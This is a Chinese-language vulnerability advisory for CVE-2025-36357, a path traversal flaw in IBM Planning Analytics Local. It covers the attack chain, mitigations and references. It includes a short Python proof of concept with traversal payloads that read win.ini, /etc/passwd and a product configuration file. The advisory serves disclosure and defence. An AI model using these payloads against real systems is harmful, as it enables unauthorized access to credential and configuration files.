CVE-2025-36357 IBM Planning Analytics Local 路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-36357

漏洞类型

路径遍历

CVSS评分

8.0 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

IBM Planning Analytics Local

漏洞概述

CVE-2025-36357是IBM Planning Analytics Local中的一个高危路径遍历漏洞。该漏洞影响版本2.1.0至2.1.14，允许经过身份验证的远程攻击者通过构造包含绝对路径序列的特制URL请求来遍历系统目录。攻击者可以利用此漏洞查看、读取或写入目标系统上的任意文件，从而可能导致敏感信息泄露、配置文件被篡改或进一步的攻击。由于该漏洞需要低权限用户身份且需要用户交互，CVSS评分达到8.0，属于高危漏洞。攻击向量为网络形式，攻击复杂度较低，但需要利用特殊构造的路径序列进行目录遍历。

技术细节

该漏洞是典型的路径遍历（Directory Traversal）漏洞，存在于IBM Planning Analytics Local的Web接口中。漏洞根源在于应用程序未能正确验证和清理用户输入的路径参数。攻击者通过在URL请求中插入路径遍历序列（如../或绝对路径），可以绕过安全限制访问系统任意文件。在IBM Planning Analytics Local 2.1.0至2.1.14版本中，攻击者可以利用包含绝对路径序列的特制URL请求，实现目录遍历攻击。成功利用后，攻击者可以读取敏感配置文件、密码文件、应用程序代码等，甚至可以通过写入操作实现远程代码执行。此漏洞需要攻击者具备低权限用户账号，并通过诱导合法用户点击恶意链接或访问特制页面来触发攻击。

攻击链分析

STEP 1

步骤1

攻击者获取IBM Planning Analytics Local的低权限用户账号

STEP 2

步骤2

攻击者构造包含绝对路径序列或../的特制URL请求

STEP 3

步骤3

通过社会工程或恶意链接诱导已登录用户访问特制URL

STEP 4

步骤4

服务器端应用程序未正确验证路径参数，允许目录遍历

STEP 5

步骤5

攻击者成功读取或写入目标系统上的任意文件

STEP 6

步骤6

利用获取的敏感信息或写入的恶意文件实现进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-36357 Path Traversal PoC
# Target: IBM Planning Analytics Local 2.1.0 - 2.1.14
import requests

target_url = "http://target.com/tm1web/"

# Path traversal payloads to read sensitive files
payloads = [
    "/../../../../../../../../windows/win.ini",
    "/../../../../../../../../etc/passwd",
    "/../../../../../../../../ibm/PlanningAnalyticsLocal/conf/tm1s_config.toml"
]

# Authentication (low privilege user)
auth = ('lowpriv_user', 'password')

for payload in payloads:
    try:
        url = target_url + "api/v1/" + payload
        response = requests.get(url, auth=auth, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Success: {payload}")
            print(response.text[:500])
        else:
            print(f"[-] Failed: {payload} - Status: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

影响范围

IBM Planning Analytics Local 2.1.0

IBM Planning Analytics Local 2.1.1

IBM Planning Analytics Local 2.1.2

IBM Planning Analytics Local 2.1.3

IBM Planning Analytics Local 2.1.4

IBM Planning Analytics Local 2.1.5

IBM Planning Analytics Local 2.1.6

IBM Planning Analytics Local 2.1.7

IBM Planning Analytics Local 2.1.8

IBM Planning Analytics Local 2.1.9

IBM Planning Analytics Local 2.1.10

IBM Planning Analytics Local 2.1.11

IBM Planning Analytics Local 2.1.12

IBM Planning Analytics Local 2.1.13

IBM Planning Analytics Local 2.1.14

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制IBM Planning Analytics Local的网络访问，仅允许受信任的IP地址访问；2) 启用强认证机制和会话管理；3) 配置Web应用防火墙规则阻止包含路径遍历序列的请求；4) 监控和审查所有文件访问日志，及时发现异常行为；5) 对敏感文件和目录实施额外的访问控制；6) 限制低权限用户的功能范围。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36357
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36357
3 Details https://www.cvedetails.com/cve/CVE-2025-36357/
4 VulDB https://vuldb.com/cve/CVE-2025-36357
5 Link https://www.ibm.com/support/pages/node/7251265